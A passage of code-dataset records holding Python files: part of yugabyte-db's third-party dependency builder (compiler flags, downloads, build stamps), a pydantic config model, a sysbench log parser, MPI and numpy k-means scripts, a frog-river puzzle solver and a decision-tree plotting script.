{dep.name} is being built with CMake but its use_cppflags_env_var ' \\\n            'function returns True. CPPFLAGS only applies to configure-based builds.'\n\n        preprocessor_flags = self.get_effective_preprocessor_flags(dep)\n        c_flags_str = ' '.join(preprocessor_flags + self.get_effective_c_flags(dep))\n        cxx_flags_str = ' '.join(preprocessor_flags + self.get_effective_cxx_flags(dep))\n\n        ld_flags_str = ' '.join(self.get_effective_ld_flags(dep))\n        exe_ld_flags_str = ' '.join(self.get_effective_executable_ld_flags(dep))\n        return [\n            '-DCMAKE_C_FLAGS={}'.format(c_flags_str),\n            '-DCMAKE_CXX_FLAGS={}'.format(cxx_flags_str),\n            '-DCMAKE_SHARED_LINKER_FLAGS={}'.format(ld_flags_str),\n            '-DCMAKE_EXE_LINKER_FLAGS={}'.format(exe_ld_flags_str),\n            '-DCMAKE_EXPORT_COMPILE_COMMANDS=ON',\n            '-DCMAKE_INSTALL_PREFIX={}'.format(dep.get_install_prefix(self)),\n            '-DCMAKE_POSITION_INDEPENDENT_CODE=ON'\n        ]\n\n    def perform_pre_build_steps(self, dep: Dependency) -> None:\n        log(\"\")\n        colored_log(YELLOW_COLOR, SEPARATOR)\n        colored_log(YELLOW_COLOR, \"Building %s (%s)\", dep.name, self.build_type)\n        colored_log(YELLOW_COLOR, SEPARATOR)\n\n        src_path, src_path_type = self.fs_layout.get_source_path_with_type(dep)\n\n        def do_default_download() -> None:\n            self.download_manager.download_dependency(\n                dep=dep,\n                src_path=src_path,\n                archive_path=self.fs_layout.get_archive_path(dep))\n\n        if src_path_type == file_system_layout.SourcePathType.DEFAULT:\n            log(\"Downloading %s\", dep)\n            do_default_download()\n        elif src_path_type == file_system_layout.SourcePathType.DEV_REPO:\n            if os.path.exists(src_path):\n                log(\"Using existing source directory (development repo) %s\", src_path)\n            elif (dep.github_org_name and\n                  dep.github_repo_name and\n                  dep.github_ref and\n                  len(dep.patches) == 0):\n                git_url = 'git@github.com:{}/{}.git'.format(\n                    dep.github_org_name, dep.github_repo_name)\n                git_util.git_clone(git_url, dep.github_ref, src_path,\n                                   depth=constants.GIT_CLONE_DEPTH)\n            else:\n                log(\"Dependency %s does not have a Git URL and/or has patches (%d patches), doing \"\n                    \"regular archive download to %s instead of a Git clone\",\n                    dep.name, len(dep.patches), src_path)
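\n                # Dependencies without a Git URL, or with patches to apply, must go through\n                # the regular archive download rather than a direct Git clone.\n                do_default_download()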
\n        else:\n            raise ValueError(\"Unhandled source path type: %s for %s. Source path: %s\" % (\n                src_path_type, dep.name, src_path))\n\n        self.fossa_deps.append({\n            \"name\": dep.name,\n            \"version\": dep.version,\n            \"url\": dep.download_url\n        })\n\n    def get_clang_toolchain_dir(self) -> Optional[str]:\n        if self.toolchain and self.compiler_choice.is_clang():\n            return self.toolchain.toolchain_root\n        return None\n\n    def build_dependency(self, dep: Dependency, only_process_flags: bool = False) -> None:\n        \"\"\"\n        Build the given dependency.\n\n        :param only_process_flags: if this is True, we will only set up the compiler and linker\n            flags and apply all the side effects of that process, such as collecting the set of\n            allowed library paths referred to by the final artifacts. If False, we will actually do\n            the build.\n        \"\"\"\n\n        self.compiler_choice.set_compiler(\n            use_compiler_wrapper=self.args.use_compiler_wrapper or dep.need_compiler_wrapper(self))\n        if self.args.download_extract_only:\n            log(\"Skipping build of dependency %s, build type %s, --download-extract-only is \"\n                \"specified.\", dep.name, self.build_type)\n            return\n\n        self.init_flags(dep)\n\n        # This is needed at least for glog to be able to find gflags.\n        self.add_rpath(\n            os.path.join(self.fs_layout.tp_installed_dir, self.build_type.dir_name(), 'lib'))\n\n        if self.build_type != BuildType.COMMON:\n            # Needed to find libunwind for Clang 10 when using compiler-rt.\n            self.add_rpath(os.path.join(\n                self.fs_layout.tp_installed_dir, BuildType.COMMON.dir_name(), 'lib'))\n\n        if only_process_flags:\n            log(\"Skipping the build of dependency %s\", dep.name)\n            return\n\n        env_vars: Dict[str, Optional[str]] = {\n            \"CPPFLAGS\": \" \".join(self.preprocessor_flags)\n        }\n\n        use_cppflags_env_var = dep.use_cppflags_env_var()\n        preprocessor_flags = self.get_effective_preprocessor_flags(dep)\n\n        cppflags_list: List[str] = []\n        if use_cppflags_env_var:\n            # Preprocessor flags are specified as CPPFLAGS.\n            preprocessor_flags_in_compiler_flags = []\n            cppflags_list = preprocessor_flags\n        else:\n            # Preprocessor flags are specified in CXXFLAGS and CFLAGS directly.\n            preprocessor_flags_in_compiler_flags = preprocessor_flags\n            cppflags_list = []\n\n        log_and_set_env_var_to_list(env_vars, 'CPPFLAGS', cppflags_list)\n\n        log_and_set_env_var_to_list(\n            env_vars,\n            'CXXFLAGS',\n            preprocessor_flags_in_compiler_flags + self.get_effective_cxx_flags(dep))\n        log_and_set_env_var_to_list(\n            env_vars,\n            'CFLAGS',\n            preprocessor_flags_in_compiler_flags + self.get_effective_c_flags(dep))\n        log_and_set_env_var_to_list(env_vars, 'LDFLAGS', self.get_effective_ld_flags(dep))\n        log_and_set_env_var_to_list(\n            env_vars, 'ASFLAGS', self.get_effective_assembler_flags(dep))\n        log_and_set_env_var_to_list(env_vars, 'LIBS', self.libs)\n\n        compiler_wrapper_extra_ld_flags = dep.get_compiler_wrapper_ld_flags_to_append(self)\n        if compiler_wrapper_extra_ld_flags:\n            if not self.compiler_choice.use_compiler_wrapper:\n                raise RuntimeError(\n                    \"Need to add extra linker arguments in the compiler wrapper, but compiler \"\n                    \"wrapper is not being used: %s\" % compiler_wrapper_extra_ld_flags)\n            log_and_set_env_var_to_list(\n                env_vars, COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_APPEND,\n                compiler_wrapper_extra_ld_flags)\n\n        compiler_wrapper_ld_flags_to_remove: Set[str] = dep.get_compiler_wrapper_ld_flags_to_remove(\n            self)\n        if compiler_wrapper_ld_flags_to_remove:\n            if not self.compiler_choice.use_compiler_wrapper:\n                raise RuntimeError(\n                    \"Need to remove some linker arguments in the compiler 
wrapper, but compiler \"\n \"wrapper is not being used: %s\" % sorted(compiler_wrapper_ld_flags_to_remove))\n log_and_set_env_var_to_list(\n env_vars, COMPILER_WRAPPER_ENV_VAR_NAME_LD_FLAGS_TO_REMOVE,\n sorted(compiler_wrapper_ld_flags_to_remove))\n\n for k, v in env_vars.items():\n log(\"Setting environment variable %s to: %s\" % (k, v))\n\n if self.build_type == BuildType.ASAN:\n # To avoid errors similar to:\n # https://gist.githubusercontent.com/mbautin/4b8eec566f54bcc35706dcd97cab1a95/raw\n #\n # This could also be fixed to some extent by the compiler flags\n # -mllvm -asan-use-private-alias=1\n # but applying that flag to all builds is complicated in practice and is probably\n # best done using a compiler wrapper script, which would slow things down.\n #\n # Also do not detect memory leaks during the build process. E.g. configure scripts might\n # create some programs that have memory leaks and the configure process would fail.\n env_vars[\"ASAN_OPTIONS\"] = ':'.join([\"detect_odr_violation=0\", \"detect_leaks=0\"])\n\n compile_commands_tmp_dir = None\n\n clang_toolchain_dir = self.get_clang_toolchain_dir()\n\n try:\n if self.args.compile_commands and not self.build_type.is_sanitizer():\n compile_commands_tmp_dir = compile_commands.get_compile_commands_tmp_dir_path(\n dep.name)\n env_vars[compile_commands.TMP_DIR_ENV_VAR_NAME] = compile_commands_tmp_dir\n util.mkdir_p(compile_commands_tmp_dir)\n\n src_dir = self.fs_layout.get_source_path(dep)\n build_dir = self.create_build_dir_and_prepare(dep)\n if self.args.postprocess_compile_commands_only:\n log(\"Only post-processing compile_commands.json in %s, skipping build\", build_dir)\n compile_commands.postprocess_compile_commands(\n build_dir, self.bazel_path_mapping, clang_toolchain_dir, src_dir)\n return\n\n with PushDir(build_dir):\n with EnvVarContext(**env_vars):\n write_env_vars(DEPENDENCY_ENV_FILE_NAME)\n log(\"PATH=%s\" % os.getenv('PATH'))\n dep.build(self)\n if compile_commands_tmp_dir is not None:\n compile_commands.aggregate_compile_commands(\n compile_commands_tmp_dir, build_dir, self.bazel_path_mapping,\n clang_toolchain_dir, src_dir)\n finally:\n if compile_commands_tmp_dir is not None:\n log(\"Deleting %s\", compile_commands_tmp_dir)\n subprocess.check_call(['rm', '-rf', compile_commands_tmp_dir])\n\n self.save_build_stamp_for_dependency(dep)\n log(\"\")\n log(\"Finished building %s (%s)\", dep.name, self.build_type)\n log(\"\")\n\n # Determines if we should rebuild a component with the given name based on the existing \"stamp\"\n # file and the current value of the \"stamp\" (based on Git SHA1 and local changes) for the\n # component. 
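The current stamp is compared with the one saved after the previous\n    # successful build of the same dependency and build type.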
\n    # Returns True if the dependency needs to be rebuilt.\n    def should_rebuild_dependency(self, dep: Dependency) -> bool:\n        dep_name_and_build_type_str = \"%s (%s)\" % (dep.name, self.build_type)\n        if self.args.ignore_build_stamps:\n            log(\"Ignoring build stamps (--ignore-build-stamps specified), will rebuild: %s\",\n                dep_name_and_build_type_str)\n            return True\n\n        stamp_path = self.fs_layout.get_build_stamp_path_for_dependency(dep, self.build_type)\n        old_build_stamp = None\n        if os.path.exists(stamp_path):\n            with open(stamp_path, 'rt') as inp:\n                old_build_stamp = inp.read()\n\n        new_build_stamp = self.get_build_stamp_for_dependency(dep)\n\n        if dep.dir_name is not None:\n            src_dir = self.fs_layout.get_source_path(dep)\n            if not os.path.exists(src_dir):\n                log(\"Have to rebuild %s: source dir %s does not exist\",\n                    dep_name_and_build_type_str, src_dir)\n                return True\n\n        build_dir = self.fs_layout.get_build_dir_for_dependency(dep, self.build_type)\n        if not os.path.exists(build_dir):\n            log(\"Have to rebuild %s: build dir %s does not exist\",\n                dep_name_and_build_type_str, build_dir)\n            return True\n\n        if old_build_stamp == new_build_stamp:\n            if self.args.force:\n                log(\"No changes detected for %s, rebuilding anyway (--force specified).\",\n                    dep_name_and_build_type_str)\n            else:\n                log(\"Not rebuilding %s -- nothing changed.\", dep_name_and_build_type_str)\n                return False\n\n        log(\"Have to rebuild %s (%s):\", dep.name, self.build_type)\n        log(\"Old build stamp for %s (from %s):\\n%s\",\n            dep.name, stamp_path, indent_lines(old_build_stamp))\n        log(\"New build stamp for %s:\\n%s\",\n            dep.name, indent_lines(new_build_stamp))\n        return True\n\n    # Come up with a string that allows us to tell when to rebuild a particular third-party\n    # dependency.
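\n    # Any mismatch between this stamp and the one stored on disk causes the\n    # dependency to be rebuilt (see should_rebuild_dependency above).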
\n    # The stamp combines the SHA1 of the last Git commit that touched the relevant input\n    # files with hashes of any uncommitted changes to those files.\n    def get_build_stamp_for_dependency(self, dep: Dependency) -> str:\n        module_name = dep.__class__.__module__\n        assert isinstance(module_name, str), \"Dependency's module is not a string: %s\" % module_name\n        assert module_name.startswith('build_definitions.'), \"Invalid module name: %s\" % module_name\n        module_name_components = module_name.split('.')\n        assert len(module_name_components) == 2, (\n            \"Expected two components: %s\" % module_name_components)\n        module_name_final = module_name_components[-1]\n        input_files_for_stamp = [\n            'python/yugabyte_db_thirdparty/yb_build_thirdparty_main.py',\n            'build_thirdparty.sh',\n            os.path.join('python', 'build_definitions', '%s.py' % module_name_final)\n        ]\n\n        for path in input_files_for_stamp:\n            abs_path = os.path.join(YB_THIRDPARTY_DIR, path)\n            if not os.path.exists(abs_path):\n                fatal(\"File '%s' does not exist -- expecting it to exist when creating a 'stamp' \"\n                      \"for the build configuration of '%s'.\", abs_path, dep.name)\n\n        with PushDir(YB_THIRDPARTY_DIR):\n            git_commit_sha1 = subprocess.check_output(\n                ['git', 'log', '--pretty=%H', '-n', '1'] + input_files_for_stamp\n            ).strip().decode('utf-8')\n            build_stamp = 'git_commit_sha1={}\\n'.format(git_commit_sha1)\n            for git_extra_arg in (None, '--cached'):\n                git_extra_args = [git_extra_arg] if git_extra_arg else []\n                git_diff = subprocess.check_output(\n                    ['git', 'diff'] + git_extra_args + input_files_for_stamp)\n                git_diff_sha256 = hashlib.sha256(git_diff).hexdigest()\n                build_stamp += 'git_diff_sha256{}={}\\n'.format(\n                    '_'.join(git_extra_args).replace('--', '_'),\n                    git_diff_sha256)\n            return build_stamp\n\n    def save_build_stamp_for_dependency(self, dep: Dependency) -> None:\n        stamp = self.get_build_stamp_for_dependency(dep)\n        stamp_path = self.fs_layout.get_build_stamp_path_for_dependency(dep, self.build_type)\n\n        log(\"Saving new build stamp to '%s':\\n%s\", stamp_path, indent_lines(stamp))\n        with open(stamp_path, \"wt\") as out:\n            out.write(stamp)\n\n    def create_build_dir_and_prepare(self, dep: Dependency) -> str:\n        src_dir = self.fs_layout.get_source_path(dep)\n        if not os.path.isdir(src_dir):\n            fatal(\"Directory '{}' does not exist\".format(src_dir))\n\n        build_dir = self.fs_layout.get_build_dir_for_dependency(dep, self.build_type)\n\n        if self.args.delete_build_dir:\n            log(\"Deleting directory %s (--delete-build-dir specified)\", build_dir)\n            subprocess.check_call(['rm', '-rf', build_dir])\n        util.mkdir_p(build_dir)\n\n        # Write the source path to a file in the build directory. 
We use this during processing of\n # compilation database files to map file paths in the build directory back to the source\n # directory.\n util.write_file(os.path.join(build_dir, constants.SRC_PATH_FILE_NAME), src_dir + '\\n')\n\n if dep.copy_sources:\n if dep.shared_and_static:\n target_dirs = [\n os.path.join(build_dir, subdir_name)\n for subdir_name in ['shared', 'static']\n ]\n else:\n target_dirs = [build_dir]\n\n for target_dir in target_dirs:\n log(\"Bootstrapping %s from %s using rsync\", target_dir, src_dir)\n bootstrap_start_sec = time.time()\n subprocess.check_call(['rsync', '-a', src_dir + '/', target_dir])\n bootstrap_elapsed_sec = time.time() - bootstrap_start_sec\n log(\"Bootstrapping %s took %.3f sec\", target_dir, bootstrap_elapsed_sec)\n\n return build_dir\n\n def is_release_build(self) -> bool:\n \"\"\"\n Distinguishes between build types that are potentially used in production releases from\n build types that are only used in testing (e.g. ASAN+UBSAN, TSAN).\n \"\"\"\n return self.build_type in [BuildType.COMMON, BuildType.UNINSTRUMENTED]\n\n def cmake_build_type_for_test_only_dependencies(self) -> str:\n return 'Release' if self.is_release_build() else 'Debug'\n\n def check_cxx_compiler_flag(self, flag: str) -> bool:\n compiler_path = self.compiler_choice.get_cxx_compiler()\n log(f\"Checking if the compiler {compiler_path} accepts the flag {flag}\")\n process = subprocess.Popen(\n [compiler_path, '-x', 'c++', flag, '-'],\n stdin=subprocess.PIPE)\n assert process.stdin is not None\n process.stdin.write(\"int main() { return 0; }\".encode('utf-8'))\n process.stdin.close()\n return process.wait() == 0\n\n def add_checked_flag(self, flags: List[str], flag: str) -> None:\n if self.check_cxx_compiler_flag(flag):\n flags.append(flag)\n\n def get_openssl_dir(self) -> str:\n return os.path.join(self.fs_layout.tp_installed_common_dir)\n\n def get_openssl_related_cmake_args(self) -> List[str]:\n \"\"\"\n Returns a list of CMake arguments to use to pick up the version of OpenSSL that we should be\n using. Returns an empty list if the default OpenSSL installation should be used.\n \"\"\"\n openssl_dir = self.get_openssl_dir()\n openssl_options = ['-DOPENSSL_ROOT_DIR=' + openssl_dir]\n openssl_crypto_library = os.path.join(\n openssl_dir, 'lib', 'libcrypto.' + self.shared_lib_suffix)\n openssl_ssl_library = os.path.join(openssl_dir, 'lib', 'libssl.' 
+ self.shared_lib_suffix)\n openssl_options += [\n '-DOPENSSL_CRYPTO_LIBRARY=' + openssl_crypto_library,\n '-DOPENSSL_SSL_LIBRARY=' + openssl_ssl_library,\n '-DOPENSSL_LIBRARIES=%s;%s' % (openssl_crypto_library, openssl_ssl_library)\n ]\n return openssl_options\n","repo_name":"yugabyte/yugabyte-db-thirdparty","sub_path":"python/yugabyte_db_thirdparty/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":68219,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"20975416266","text":"from __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Optional\n\nfrom pydantic import BaseModel, Extra\n\nfrom models.scene import PerformerGenderEnum\n\n\nclass TemplateVariablesConfig(BaseModel, validate_assignment=True, extra=Extra.forbid):\n PERFORMERS_CONFIG: Optional[PerformersConfig] = None\n SCENE_TITLE_CONFIG: Optional[SceneTitleConfig] = None\n\n\n# The type of the ORDER_BY keys in the PerformersConfig\nclass PerformerOrderByKeys(str, Enum):\n ID = \"id\"\n NAME = \"name\"\n\n\nclass PerformersConfig(BaseModel, validate_assignment=True, extra=Extra.forbid):\n # The separator to use between performers in the performers list. ie if SEPARATOR is \", \" then the list will be \"performer1, performer2, performer3\"\n SEPARATOR: str = \", \"\n # The max number of performers to include in the performers list. ie if LIMIT is 3 and there are 5 performers, then only the first 3 performers will be included in the list\n LIMIT: Optional[int] = None\n # a list of genders to exclude from the performers list\n EXCLUDE_GENDERS: Optional[list[PerformerGenderEnum]] = None\n # Can be \"id\" or \"name\"\n ORDER_BY: Optional[PerformerOrderByKeys] = PerformerOrderByKeys.ID\n # Default {performers} value if there are no performers\n # NOTE: This is only used if there are strictly no performers in the scene. 
If the performers are filtered out using LIMIT or EXCLUDE_GENDERS, then the {performers} value will be empty.\n    NO_PERFORMER_NAME: Optional[str] = \"No Performers\"\n\n\nclass SceneTitleConfig(BaseModel, validate_assignment=True, extra=Extra.forbid):\n    REPLACE: Optional[dict[str, str]] = None\n    REPLACE_FROM_BEGINNING: Optional[dict[str, str]] = None\n\n\nSceneTitleConfig.update_forward_refs()\nPerformersConfig.update_forward_refs()\nTemplateVariablesConfig.update_forward_refs()\n","repo_name":"sugoi-ahegao/renamer-2","sub_path":"src/models/template_variables_config.py","file_name":"template_variables_config.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32002374453","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport sys\nimport os\nimport re\nimport math\nimport numpy as np\nimport pandas as p\n\nregexHeader = re.compile('microbenchmark of ([\\w\\d/]+)')\nARR_SWAP_TYPE=[\"public\",\"private\"]\nARR_IO_TYPE=[\"oltp_read_only\", \"oltp_write_only\"]\nARR_NUM_THREAD=[64, 128]\nARR_MEM_RATIO=[10, 20, 30]\n\ndef main():\n\tregexAvg = re.compile('avg:\\s*(\\d+\\.\\d+)') # ms unit\n\tfor IO_TYPE in ARR_IO_TYPE:\n\t\tfor NUM_THREAD in ARR_NUM_THREAD:\n\t\t\tfor MEM_RATIO in ARR_MEM_RATIO:\n\t\t\t\tarr = []\n\t\t\t\tfor CONT_ID in range(1, NUM_THREAD + 1): \n\t\t\t\t\tLOG_PATH = \"/mnt/data/motiv-old/cont-mysql/\"+ \\\n\t\t\t\t\t\t\t\tIO_TYPE+\"-\"+str(NUM_THREAD)+\"-ratio\"+str(MEM_RATIO)+\"/sysbench\"+str(CONT_ID)+\".output\"\n\n\t\t\t\t\twith open(LOG_PATH) as f:\n\t\t\t\t\t\tf.seek(0)\n\t\t\t\t\t\tfor line in f:\n\t\t\t\t\t\t\tmatch = regexAvg.search(line)\n\t\t\t\t\t\t\tif match:\n\t\t\t\t\t\t\t\tarr.append(float(match.group(1)))\n\n\t\t\t\tprint(IO_TYPE+\"-\"+str(NUM_THREAD)+\"-\"+str(MEM_RATIO),end=\"\\n\")\n#\t\t\t\tprint(\"motiv \"+str(np.mean(arr))+\" \"+str(np.std(arr)))\n\t\t\t\tfor i in range(NUM_THREAD):\n\t\t\t\t\tprint(arr[i],end=\" \")\n\n# Beginning of the program\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"mkwon0/IOD-docker","sub_path":"test-system/test-swap/motiv/anal/anal-mysql.py","file_name":"anal-mysql.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3350143415","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 13 14:52:52 2019\r\n\r\n@author: yifan\r\n\"\"\"\r\n\r\nimport csv, time, random, math\r\n\r\nfrom mpi4py import MPI\r\n\r\nimport numpy\r\n\r\n\r\ndef eucl_distance(point_one, point_two):  # compute the Euclidean distance between two points\r\n    if(len(point_one) != len(point_two)):\r\n        raise Exception(\"Error: non comparable points\")\r\n    \r\n    sum_diff=0\r\n    for i in range(len(point_one)):\r\n        diff = pow((float(point_one[i]) - float(point_two[i])), 2)\r\n        sum_diff += diff\r\n    final = math.sqrt(sum_diff)\r\n    return final\r\n\r\n\r\ndef compare_center(initial_center, derived_center, dimensions, num_clusters, cutoff):\r\n    if(len(initial_center) != len(derived_center)):\r\n        raise Exception(\"Error: non comparable points\")\r\n    flag = 0\r\n    for i in range(num_clusters):\r\n        diff = eucl_distance(initial_center[i], derived_center[i])\r\n        if(diff < cutoff):\r\n            flag += 1\r\n    return flag\r\n\r\nnums=10*6\r\n\r\ndata=[[float((i+1000)/nums),float((2000+i)/nums)] for i in range(nums)]\r\n\r\n#data=[]\r\n#with open('kmeans_1.txt','r') as f:\r\n#    for line in f:\r\n#        tmps=line.strip('\\n').split()\r\n#        if tmps!=[]:\r\n#            data.append([float(tmp) for tmp in tmps])\r\n\r\ndef main():
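\r\n    # Each MPI rank owns one candidate centroid; an MPI.MIN reduction followed by a\r\n    # broadcast gives every rank each point's smallest distance to any centroid.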
\r\n    global data\r\n    comm = MPI.COMM_WORLD\r\n    rank = comm.Get_rank()\r\n    size = comm.Get_size()\r\n    \r\n    dimensions=2\r\n    num_clusters=size\r\n    cutoff = 0.002\r\n    compare_val = 0\r\n    num_points = len(data)\r\n    dimensions = len(data[0])\r\n    initial = []\r\n    for i in range(size):  # initial holds one starting centroid per rank, taken from data\r\n        initial.append(data[i])\r\n    start_time = time.time()\r\n    while True:\r\n        dist = []\r\n        min_dist = numpy.zeros(num_points)\r\n        for point in data:  # dist records the distance from this rank's centroid to every point\r\n            dist.append(eucl_distance(initial[rank], point))\r\n        temp_dist = numpy.array(dist)\r\n        comm.Reduce(temp_dist, min_dist, op = MPI.MIN)  # min_dist holds each point's smallest distance to any centroid\r\n        comm.Barrier()\r\n        if rank == 0:\r\n            min_dist = min_dist.tolist()  # convert the numpy array to a list\r\n        recv_min_dist = comm.bcast(min_dist, root = 0)\r\n        comm.Barrier()\r\n        cluster = []\r\n        for i in range(len(recv_min_dist)):\r\n            if recv_min_dist[i] == dist[i]:\r\n                cluster.append(data[i])  # this point is closest to this rank's centroid\r\n        center = []\r\n        center_val = [0] * dimensions\r\n        for i in cluster:\r\n            for j in range(dimensions):\r\n                center_val[j] += float(i[j])\r\n        for j in range(dimensions):\r\n            if(len(cluster) != 0):\r\n                center_val[j] = center_val[j] / len(cluster)  # i.e. the mean coordinate of this cluster\r\n        center = comm.gather(center_val, root = 0)\r\n        comm.Barrier()\r\n        if rank == 0:\r\n            compare_val = compare_center(initial, center, dimensions, size, cutoff)\r\n            if compare_val == size:\r\n                print('my rank is %d'% rank,center)\r\n                print(\"Execution time %s seconds\" % (time.time() - start_time))\r\n        break_val = comm.bcast(compare_val, root = 0)\r\n        initial = comm.bcast(center, root = 0)\r\n        comm.Barrier()\r\n        if break_val == size:\r\n            break\r\n    MPI.Finalize()\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"yifan2/mpi4py-python","sub_path":"kemeans_mpi.py","file_name":"kemeans_mpi.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"19353095984","text":"\"\"\"\nriver = \"***** * * * * * *\" => crossable\n 011 2 3 4 4 3 4\n 011 2 3 4 4 3 3 4\n 01111 3 4 4 3 3 4\n\nriver = \"***** \" => not crossable\n 011 2 3\n\nInitial speed: 0\nInitial location: 0\n\nSpeed = {speed - 1, speed, speed + 1}\nLoc = loc + speed\n\"\"\"\n\n\nSPEED_OFFSETS = [-1, 0, 1]\n\n\ndef is_crossable(river, pos, speed):\n    \"\"\"\n    print is_crossable(\"** *\", 0, 0), \"should be True\"\n    print is_crossable(\"***** *\", 0, 0), \"should be False\"\n\n    :param river:\n    :param pos:\n    :param speed:\n    :return:\n    \"\"\"\n    if river[pos] == \" \":\n        return False\n\n    for offset in SPEED_OFFSETS:\n        if speed + offset <= 0:\n            continue\n\n        ns = speed + offset\n        np = pos + ns\n        if np >= len(river):\n            return True\n        if river[np] == \" \":\n            continue\n        if is_crossable(river, np, ns):\n            return True\n\n    return False\n\n\ndef is_crossable_optimized(river):\n    # Cached attempts elements are two-tuples of position and speed that\n    # have been attempted\n    cached_attempts = set()\n\n    return _is_crossable_helper(river, cached_attempts, 0, 0)\n\n\ndef _is_crossable_helper(river, cached_attempts, pos, speed):\n    if (pos, speed) in cached_attempts:\n        return False  # been there, done that\n\n    cached_attempts.add((pos, speed))\n\n    if pos >= len(river):\n        return True  # crossed - yay!\n    if river[pos] == \" \":\n        return False  # drowned :(\n\n    for offset in SPEED_OFFSETS:\n        new_speed = speed + offset\n        if new_speed <= 0:  # may only go forward\n            continue\n\n        if _is_crossable_helper(river, cached_attempts, pos + new_speed, new_speed):\n            return True\n\n    return False
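\n\n\n# Illustrative example (added; not part of the original file):\n# is_crossable_optimized(\"** *\")  # True: jumps 0 -> 1 -> 3 -> past the far bank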
False\n","repo_name":"vitaly-krugl/interview-prep","sub_path":"dp/frog_river/frog_river.py","file_name":"frog_river.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70146467047","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef kmeans(data, k, iter_time):\n centroids = data[np.random.choice(range(data.shape[0]), k, replace=False)]\n\n print('centroids test: ', centroids)\n\n labels = np.zeros(data.shape[0])\n \n for _ in range(iter_time):\n for i in range(data.shape[0]):\n distances = np.linalg.norm(data[i] - centroids, axis=1)\n labels[i] = np.argmin(distances)\n \n for j in range(k):\n centroids[j] = np.mean(data[labels == j], axis=0)\n \n return centroids, labels\n\n#data = pd.read_csv('./k-means/test0.csv')\ndata = np.genfromtxt('./k-means/test0.csv', delimiter=',', skip_header=True)\n\nprint('data shape: ', data.shape)\n\nk = 3\n\ncentroids, labels = kmeans(data, k , data.shape[0])\n\n#print(data[:,0])\n#print(data[:,1])\nplt.scatter(data[:, 0], data[:, 1], c=labels)\nplt.scatter(centroids[:, 0], centroids[:, 1], c='red', marker='X')\nplt.title('K-means testing')\nplt.show()\n","repo_name":"d940909492/machine-learning-practice","sub_path":"Kmeans/kmeans_without_sklearn.py","file_name":"kmeans_without_sklearn.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24312417693","text":"NAME = '2_plot_decision_tree' ## Name of the notebook goes here (without the file extension!)\nPROJECT = 'Decision Tree Classifier'\nPYTHON_VERSION = '3.6.7'\n\n## Imports\nimport os\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## Set working directory \nworkdir = '/home/filip/Git/'+PROJECT\nos.chdir(workdir)\n\n## Set up pipeline folder if missing \nif os.path.exists(os.path.join('empirical', '2_pipeline')):\n pipeline = os.path.join('empirical', '2_pipeline', NAME)\nelse:\n pipeline = os.path.join('2_pipeline', NAME)\n \nif not os.path.exists(pipeline):\n os.makedirs(pipeline)\n for folder in ['out', 'store', 'tmp']:\n os.makedirs(os.path.join(pipeline, folder))\n\n## Code\nDTC = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/DTC.obj', 'rb'))\n\nvlines = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/vlines.obj', 'rb'))\nhlines = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/hlines.obj', 'rb'))\n\ndims = pickle.load(open(workdir+'/empirical/2_pipeline/1_get_tree/dims.obj', 'rb'))\n\nx_scale = np.linspace(dims[0][0], dims[0][1], 100)\ny_scale = np.linspace(dims[1][0], dims[1][1], 100)\n\ny_ticks = ['{0:.2f}'.format(y) for y in np.linspace(dims[0][0], dims[0][1], 6)]\nx_ticks = ['{0:.2f}'.format(x) for x in np.linspace(dims[1][0], dims[1][1], 6)]\n\naxis_labels = (pd\n .read_csv(workdir+'/empirical/2_pipeline/0_feature_candidates/features.csv', nrows=0)\n .columns #extracting feature names\n .tolist()\n )[1:3]\n\nmesh = np.meshgrid(x_scale, y_scale)\nmesh = list(zip(mesh[0].flatten(), mesh[1].flatten()))\n\npredicted = DTC.predict(mesh)\npredicted = predicted.reshape(100, 100)\n\n#rescale horizontal and vertical lines to match imshow dimensions (100x100)\ndef rescale(value, scale):\n _ = []\n low = float(min(scale))\n high = float(max(scale))\n try:\n for v in value:\n _.append(100*(float(v)-low)/(high-low))\n except:\n return None\n return _\n\n#plot 
\nplt.imshow(predicted)\nfor v in rescale(vlines, dims[0]):\n    plt.axvline(v, color='r', linestyle='--')\nfor h in rescale(hlines, dims[1]):\n    plt.axhline(h, color='r', linestyle='--')\n#remove ticks and labels\nplt.xlabel(axis_labels[1])\nplt.ylabel(axis_labels[0])\nplt.yticks(ticks=[0,20,40,60,80,100], labels=y_ticks[-1::-1])\nplt.xticks(ticks=[0,20,40,60,80,100], labels=x_ticks)\n\nplt.savefig(workdir+'/empirical/3_output/results/plot.png')\n","repo_name":"93fk/Decision-Tree-classifier","sub_path":"empirical/1_code/2_plot_decision_tree.py","file_name":"2_plot_decision_tree.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
